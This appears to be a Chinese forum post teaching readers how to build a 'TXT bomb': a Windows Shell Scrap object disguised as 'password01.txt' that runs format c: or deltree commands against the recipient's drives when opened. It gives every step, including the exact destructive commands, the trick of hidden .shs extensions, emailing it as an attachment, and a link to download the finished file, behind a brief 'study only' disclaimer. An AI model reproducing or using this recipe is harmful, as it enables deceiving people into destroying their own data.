前幾天我在黑白發(fā)表了一篇名為＜小鳥教小鳥制作ＴＸＴ炸.彈＞一文，得到很多熱心網(wǎng)友的大力推薦，少言在此深表謝意！由于當(dāng)時(shí)時(shí)間倉(cāng)促所以，該＂炸.彈＂還存在一些問(wèn)題．經(jīng)過(guò)一番的修改，修復(fù)了原來(lái)的一些BUG，在９８第二版和２０００服務(wù)器版下通過(guò)測(cè)試．并將原來(lái)的一個(gè)炸.彈分成了三個(gè)具有不同威力的炸.彈分別執(zhí)行．
　　下面我就將改良后的ＴＸＴ炸.彈的制作方法教給大家：1.創(chuàng)建一個(gè)只包含一個(gè)空格(為了減小文件體積)的文本文件，任意取名。
　　2.打開｛寫字板文檔｝，將此文件拖放入｛寫字板文檔｝。也可以點(diǎn)擊記｛寫字板文檔｝單欄中的“插入\對(duì)象”，彈出“插入對(duì)象”對(duì)話框，選中“從文件創(chuàng)建”，然后點(diǎn)擊“瀏覽”按鈕選擇要插入的文件。
　　3.選中該插入對(duì)象的圖標(biāo)，選擇菜單欄中的“編輯\包對(duì)象\編輯包”(如圖1)。在彈出的“對(duì)象包裝程序”對(duì)話框中，選擇菜單欄中的“編輯\命令行”，然后輸入如下命令：start.exe /m format c:/q /autotest /u ，點(diǎn)擊“確定”，此時(shí)，內(nèi)容欄中會(huì)顯示出命令內(nèi)容。
　　4.點(diǎn)擊外觀欄中的“插入圖標(biāo)”按鈕，會(huì)彈出一個(gè)警告對(duì)話框，確認(rèn)，然后任選一個(gè)圖標(biāo)。
　　5.選擇菜單欄中的“編輯\卷標(biāo)”，為此嵌入對(duì)象取一個(gè)名稱(會(huì)替換原來(lái)的文件名稱)。點(diǎn)擊“文件”菜單中的“更新”，然后關(guān)閉此對(duì)話框。
　　6.將剛剛建立的嵌入對(duì)象拖放到桌面上。文件的默認(rèn)名是“碎片”（在2000下的默認(rèn)名為＂片段＂），現(xiàn)在我們把它改成“password01.txt”。打開電子郵件程序?qū)⒆烂嫔系?ldquo;password01.txt”作為附件發(fā)出，或者將含有嵌入對(duì)象(帶有惡意命令)的文檔作為附件發(fā)出。
　　7.當(dāng)郵件接收者誤將“password01.txt.shs”文件作為“password01.txt”(如前文所述，“.SHS”擴(kuò)展名永遠(yuǎn)是隱藏的)放心地打開時(shí)，或打開文件，點(diǎn)擊文件中的嵌入對(duì)象時(shí)觸發(fā)惡意命令(彈出DOS運(yùn)行窗口，執(zhí)行格式化命令)．如果將上面的命令替換為：start.exe /m deltree /y a:\*.* c:\*.* d:\*.* 則是將刪除對(duì)方硬盤下所有文件（盤符根據(jù)實(shí)際情況自定義）；如果替換為：start.exe /m deltree /y c:\windows\system\*.* 則是刪除對(duì)方c:\windows\system\目錄底下的所有文件．（當(dāng)然大家可以改成其它的命令）
　　真的很簡(jiǎn)單，就這樣一個(gè)惡意的攻擊程序被弄出來(lái)了，太可怕了！
（切記：僅供學(xué)習(xí)與研究，切莫用來(lái)攻擊他人，更不要在沒(méi)有安全準(zhǔn)備的情況下執(zhí)行上面的文件，呵呵?。?br />原文件下載地址：http://www.aosoao.8u8.com/shs.zip

最新評(píng)論